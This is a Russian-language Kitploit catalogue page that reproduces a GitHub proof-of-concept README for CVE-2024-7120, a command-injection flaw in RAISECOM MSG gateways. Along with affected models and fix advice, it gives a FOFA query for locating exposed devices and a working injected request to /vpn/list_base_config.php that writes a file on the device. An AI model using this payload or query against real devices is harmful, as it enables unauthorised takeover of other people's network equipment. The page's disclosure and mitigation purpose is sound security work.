Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-7120 — Эксплойт proof-of-concept для уязвимости внедрения команд CVE-2024-7120 в шлюзовых устройствах RAISECOM. Предоставляет детали эксплуатации, затронутые модели и примеры атак на основе curl для тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/gh-ost00/cve-2024-7120
Безопасность IoTАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubgh-ost00/cve-2024-7120

CVE-2024-7120

Эксплойт proof-of-concept для уязвимости внедрения команд CVE-2024-7120 в шлюзовых устройствах RAISECOM. Предоставляет детали эксплуатации, затронутые модели и примеры атак на основе curl для тестирования безопасности.

Репозиторий
8222 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уязвимость внедрения команд в устройствах Raisecom (CVE-2024-7120) Доказательство концепции!

Обзор

Уязвимость внедрения команд была обнаружена в шлюзовых устройствах RAISECOM, затрагивающая модели MSG1200, MSG2100E, MSG2200 и MSG2300. Эта уязвимость позволяет удаленным злоумышленникам выполнять произвольные команды в системе через веб-интерфейс. Проблема находится в скрипте list_base_config.php, а именно через параметр template, затрагивая более 25 112 устройств в Интернете.

✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"

banner

Затронутые устройства

Аппаратное обеспечение

  • Шлюзовые устройства RAISECOM моделей MSG1200, MSG2100E, MSG2200, MSG2300

Программное обеспечение

  • 3.90

Затронутые компоненты

URI: /vpn/list_base_config.php

Описание: list_base_config.php является веб-интерфейсным компонентом шлюзовых устройств RAISECOM, используемым для управления конфигурациями VPN. Выявленная уязвимость возникает из-за неправильной обработки параметра template в этом скрипте. Этот параметр может быть использован для выполнения произвольных команд в операционной системе устройства из-за недостаточной очистки ввода.

CWE

CWE-77: Внедрение команд

Эксплуатация

Вот пример того, как можно использовать уязвимость с помощью команды curl:

root@kitploit:~
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Created by Ghost sec}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"

В этом примере команда curl отправляет вредоносный HTTP GET-запрос к скрипту list_base_config.php. Запрос использует параметр template для выполнения команды.

Фактический результат

Пример 1

banner

Пример 2

banner

Рекомендации

  1. Проверка ввода: Внедряйте строгие проверки всех пользовательских вводов, особенно тех, которые могут повлиять на системные команды или пути к файлам.
  2. Контроль доступа: Ограничьте доступ к веб-интерфейсу устройства доверенными сетями и аутентифицированными пользователями.
Скачать инструмент